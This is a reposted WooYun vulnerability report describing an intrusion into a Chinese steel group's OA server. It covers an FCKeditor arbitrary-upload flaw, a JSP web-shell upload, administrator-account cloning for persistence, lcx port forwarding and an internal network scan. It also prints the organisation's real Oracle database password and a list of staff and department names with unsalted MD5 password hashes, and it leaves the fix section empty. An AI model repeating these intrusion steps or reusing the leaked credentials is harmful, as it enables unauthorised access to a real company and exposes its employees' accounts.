记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

攀枝花钢城集团某服务器内网渗透

2016-06-12 20:35

攀枝花钢城集团办公协同系统(OA)使用了低版本的金蝶OA

OA地址: **.**.**.**:7890/oa/themes/mskin/login/login.jsp

微信截图_20160425210115.png





该系统使用了低版本FCKeditor,可上传任意文件

**.**.**.**:7890/oa/components/fck/editor/filemanager/browser/default/browser.html?Connector=**.**.**.**:7890/oa/components/fck/editor/filemanager/browser/default/connectors/jsp/connector

.png





漏洞证明:

上传shell: 2.jsp

2.png





找到数据库配置文件

code 区域
<Resource name="jdbc/DefaultDS" auth="Container" type="javax.sql.DataSource"

maxActive="100" maxIdle="20" maxWait="10000" initialSize="10" minIdle="10"

removeAbandoned="true" removeAbandonedTimeout="60" logAbandoned="true"

username="oadb" password="gcjtoa" driverClassName="oracle.jdbc.OracleDriver"

url="jdbc:oracle:thin:@//**.**.**.**:1521/oradata"/>





Oracle的数据库

5.png





管理员权限

3.png





只有一个网口,且ip显示是内网。应该是交换机使用了NAT Server服务,将内网80端口映射到公网的7890端口

4.png





上传lcx作端口转发

6.png





修改注册表,克隆管理员用户

7.png





OA用户

8.png





共有1443个用户

9.png





举例

code 区域
欣宇化工技术研发中心670b14728ad9902aecba32e22fa4f6bd

李洋202cb962ac59075b964b07152d234b70

欣宇化工海绵钛运行中心670b14728ad9902aecba32e22fa4f6bd

黄平安202cb962ac59075b964b07152d234b70

瑞矿政工部670b14728ad9902aecba32e22fa4f6bd

瑞矿保卫科8aec51422b30d61bce078b27f0babeb1

瑞矿综合办公室202cb962ac59075b964b07152d234b70

付成勇670b14728ad9902aecba32e22fa4f6bd

邱军202cb962ac59075b964b07152d234b70

任兵b96946657983c67d690243a42dde4bfe

综合财务部e99a18c428cb38d5f260853678922e03

综合技术质量部1b18918b3565fc7ee82291beb1ddb7b7

综合供销部202cb962ac59075b964b07152d234b70

综合经销部202cb962ac59075b964b07152d234b70

天洁物业6364d9d3f59aa53792fa62e5f161ca8a

绿源劳资科202cb962ac59075b964b07152d234b70

谢永强670b14728ad9902aecba32e22fa4f6bd

阳鑫办公室a0260f8b9817d316b32783dd9e644d01

阳鑫财务科ba311493f529374f0c33b5e9433574d7

瑞天政工(人事)部670b14728ad9902aecba32e22fa4f6bd

瑞泰电修分厂202cb962ac59075b964b07152d234b70

攀鑫财务科202cb962ac59075b964b07152d234b70

瑞通节能服务事业部670b14728ad9902aecba32e22fa4f6bd





瑞天政工(人事)部

10.png



瑞通西昌运营事业部

瑞通西昌运营事业部.png



绿源综合管理部

11.png



贸易公司财务科

12.png





东西太多了~这里我就不贴数据了。。。。



可进行内网渗透

code 区域
C:\Documents and Settings\Administrator>net view

服务器名称 注释



---------------------------------------------------------------------

\\GCJT-08361BB1B9

\\GQSVR-IMTS

\\GQSVR-MTS

\\HRSRV

\\NC1

\\OASERVER

\\VM01

\\WEB-INTERNAT

\\WIN-8AGEFMEVINN

\\WIN-M2GM273EOU0

\\YCGS-56F26EED9D

命令成功完成。

修复方案:

一只充满好奇心的白帽纸,绝无恶意

知识来源: www.wooyun.org/bugs/wooyun-2016-0200602

阅读:190577 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“攀枝花钢城集团某服务器内网渗透”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云